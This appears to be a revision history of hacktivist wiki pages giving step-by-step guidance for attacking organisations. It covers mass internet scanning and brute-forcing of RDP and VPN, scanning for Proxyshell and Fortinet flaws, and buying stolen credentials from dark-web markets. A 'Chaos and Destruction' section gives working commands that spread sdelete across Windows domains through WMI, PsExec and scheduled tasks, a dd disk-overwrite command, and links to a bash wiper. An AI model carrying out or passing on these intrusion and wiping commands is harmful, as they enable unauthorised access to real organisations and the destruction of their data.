* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Initial Access Tactics, techniques and procedures

2024-03-30T12:12:09Z

Booda: /* Services */

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://exposed.lol
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].

=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

'''IP Ranges''':
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Chaos and Destruction

2024-03-25T17:54:02Z

Booda: /* Wiping Linux System */

Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in [https://enlacehacktivista.org/hackback.webm Guacamaya's HackBack] video, we want to destroy data, not harm human life.

== Windows ==
=== Print your manifesto ===
<pre>
@echo off
set "manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt"
for /r "C:\" %%d in (.) do (
xcopy "%manifesto%" "%%d\" /Y
)
</pre>
=== Wiping Windows Domain ===
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Hack Back video Guacamaya made] it's best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it's a Microsoft developed and signed application removing the need to disable security controls before it's spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target.

==== Method 1 - GPO & Schtasks ====
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code>

==== Method 2 - WMI ====
[https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak/blob/main/Manual_CS.txt Using batch files to spread] sdelete64.exe utilizing Windows Management Instrumentation (WMI)

On the domain controller (DC) get a list of server names:
* <code>net view /all /domain</code>

'''Copy'''

Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list:
* <code>for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\C$\Windows\avp.exe"</code>

Specify account credentials:
* <code>start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe"</code>

'''Execute'''

Running as the domain admin now execute:
* <code>for /f %%i in (servers.txt) do wmic /node:%%i process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"</code>

Specify account credentials:
* <code>start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"</code>

==== Method 3 - PsExec ====
Using [https://learn.microsoft.com/en-us/sysinternals/downloads/psexec PsExec] to run sdelete64.exe [https://youtu.be/oMAvSpq9fYY?feature=shared&t=2811 across the network]:

'''Copy:'''
* <code>PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy "\\127.0.0.1\C$\Windows\Temp\sdelete64.exe" "C:\Windows"</code>

'''Execute:'''
* <code>start PsExec.exe -d @:\\127.0.0.1\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*</code>

==== Method 4 - Schtasks ====
Using [https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks Windows scheduled tasks] to execute sdelete64.exe on remote systems (also good for lateral movement):

Run as domain admin:

* <code>schtasks /s <COMPUTER> /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00</code>
* <code>schtasks /s <COMPUTER> /run /tn wipe</code>

Specify credentials:
* <code>schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00</code>
* <code>schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /run /tn wipe</code>

=== Encrypt Windows Domain ===
[https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Encrypt Windows Domain] (1:24:16 Wiping windows domain with Bitlocker)
* https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons

== Linux ==
=== Print your manifesto ===
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code>
=== Wiping Linux System ===
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a [https://0xjet.github.io/3OHA/2022/12/18/post.html bash wiper] to destroy those servers whilst sdelete64.exe is destroying the Windows systems.
* Bash Wiper: https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr ([https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip source])
** A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate
** Shell script compiler: https://packages.debian.org/bullseye/shc

Chaos and Destruction

2024-03-25T17:53:05Z

Booda: /* Linux */

Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in [https://enlacehacktivista.org/hackback.webm Guacamaya's HackBack] video, we want to destroy data, not harm human life.

== Windows ==
=== Print your manifesto ===
<pre>
@echo off
set "manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt"
for /r "C:\" %%d in (.) do (
xcopy "%manifesto%" "%%d\" /Y
)
</pre>
=== Wiping Windows Domain ===
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Hack Back video Guacamaya made] it's best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it's a Microsoft developed and signed application removing the need to disable security controls before it's spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target.

==== Method 1 - GPO & Schtasks ====
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code>

==== Method 2 - WMI ====
[https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak/blob/main/Manual_CS.txt Using batch files to spread] sdelete64.exe utilizing Windows Management Instrumentation (WMI)

On the domain controller (DC) get a list of server names:
* <code>net view /all /domain</code>

'''Copy'''

Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list:
* <code>for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\C$\Windows\avp.exe"</code>

Specify account credentials:
* <code>start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe"</code>

'''Execute'''

Running as the domain admin now execute:
* <code>for /f %%i in (servers.txt) do wmic /node:%%i process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"</code>

Specify account credentials:
* <code>start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"</code>

==== Method 3 - PsExec ====
Using [https://learn.microsoft.com/en-us/sysinternals/downloads/psexec PsExec] to run sdelete64.exe [https://youtu.be/oMAvSpq9fYY?feature=shared&t=2811 across the network]:

'''Copy:'''
* <code>PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy "\\127.0.0.1\C$\Windows\Temp\sdelete64.exe" "C:\Windows"</code>

'''Execute:'''
* <code>start PsExec.exe -d @:\\127.0.0.1\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*</code>

==== Method 4 - Schtasks ====
Using [https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks Windows scheduled tasks] to execute sdelete64.exe on remote systems (also good for lateral movement):

Run as domain admin:

* <code>schtasks /s <COMPUTER> /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00</code>
* <code>schtasks /s <COMPUTER> /run /tn wipe</code>

Specify credentials:
* <code>schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00</code>
* <code>schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /run /tn wipe</code>

=== Encrypt Windows Domain ===
[https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Encrypt Windows Domain] (1:24:16 Wiping windows domain with Bitlocker)
* https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons

== Linux ==
=== Print your manifesto ===
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code>
=== Wiping Linux System ===
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a [https://0xjet.github.io/3OHA/2022/12/18/post.html bash wiper] to destroy those servers whilst sdelete64.exe is destroying the Windows systems.
* https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr ([https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip source])
** A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate
** Shell script compiler: https://packages.debian.org/bullseye/shc

Chaos and Destruction

2024-03-25T17:46:20Z

Booda: /* Linux */

Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in [https://enlacehacktivista.org/hackback.webm Guacamaya's HackBack] video, we want to destroy data, not harm human life.

== Windows ==
=== Print your manifesto ===
<pre>
@echo off
set "manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt"
for /r "C:\" %%d in (.) do (
xcopy "%manifesto%" "%%d\" /Y
)
</pre>
=== Wiping Windows Domain ===
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Hack Back video Guacamaya made] it's best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it's a Microsoft developed and signed application removing the need to disable security controls before it's spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target.

==== Method 1 - GPO & Schtasks ====
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code>

==== Method 2 - WMI ====
[https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak/blob/main/Manual_CS.txt Using batch files to spread] sdelete64.exe utilizing Windows Management Instrumentation (WMI)

On the domain controller (DC) get a list of server names:
* <code>net view /all /domain</code>

'''Copy'''

Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list:
* <code>for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\C$\Windows\avp.exe"</code>

Specify account credentials:
* <code>start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe"</code>

'''Execute'''

Running as the domain admin now execute:
* <code>for /f %%i in (servers.txt) do wmic /node:%%i process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"</code>

Specify account credentials:
* <code>start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"</code>

==== Method 3 - PsExec ====
Using [https://learn.microsoft.com/en-us/sysinternals/downloads/psexec PsExec] to run sdelete64.exe [https://youtu.be/oMAvSpq9fYY?feature=shared&t=2811 across the network]:

'''Copy:'''
* <code>PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy "\\127.0.0.1\C$\Windows\Temp\sdelete64.exe" "C:\Windows"</code>

'''Execute:'''
* <code>start PsExec.exe -d @:\\127.0.0.1\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*</code>

==== Method 4 - Schtasks ====
Using [https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks Windows scheduled tasks] to execute sdelete64.exe on remote systems (also good for lateral movement):

Run as domain admin:

* <code>schtasks /s <COMPUTER> /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00</code>
* <code>schtasks /s <COMPUTER> /run /tn wipe</code>

Specify credentials:
* <code>schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00</code>
* <code>schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /run /tn wipe</code>

=== Encrypt Windows Domain ===
[https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Encrypt Windows Domain] (1:24:16 Wiping windows domain with Bitlocker)
* https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons

== Linux ==
=== Print your manifesto ===
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code>
=== Wiping Linux System ===
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a [https://0xjet.github.io/3OHA/2022/12/18/post.html bash wiper] to destroy those servers whilst sdelete64.exe is destroying the Windows systems.
* https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr ([https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip source])
** A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate
** Shell script compiler: https://packages.debian.org/bullseye/shc

Complete obliteration:
* <code>sudo dd if=/dev/urandom of=/dev/sda bs=4M status=progress</code>

Initial Access Tactics, techniques and procedures

2024-03-25T17:12:09Z

Booda: /* Vulnerability Scanning */

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
